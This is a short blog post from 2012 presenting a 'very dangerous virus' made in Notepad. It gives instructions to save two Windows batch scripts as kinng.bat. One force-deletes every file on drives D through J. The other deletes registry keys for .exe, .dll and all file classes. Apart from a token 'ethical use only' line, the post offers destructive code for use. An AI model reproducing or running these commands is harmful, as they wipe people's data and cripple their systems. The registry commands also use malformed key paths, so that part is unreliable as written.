Wednesday, 14 November 2012

Make a Very Dangerous Virus with Notepad (Final) By Hackinginfoz


USE THIS TRICK FOR ETHICAL USE ONLY

Just open your notepad

1) Click start -> all programs -> accessories -> notepad

2) Or just press or click windows key + r :: run window will open and 
    type notepad and hit enter .
NOW  TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

then save it as kinng.bat and the batch file is created .

WARNING :: This is the most dangerous virus 


Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

now save it as kinng.bat and the batch file is created .

No comments:

Speak Your Mind

Powered By Blogger · Designed By Seo Blogger Templates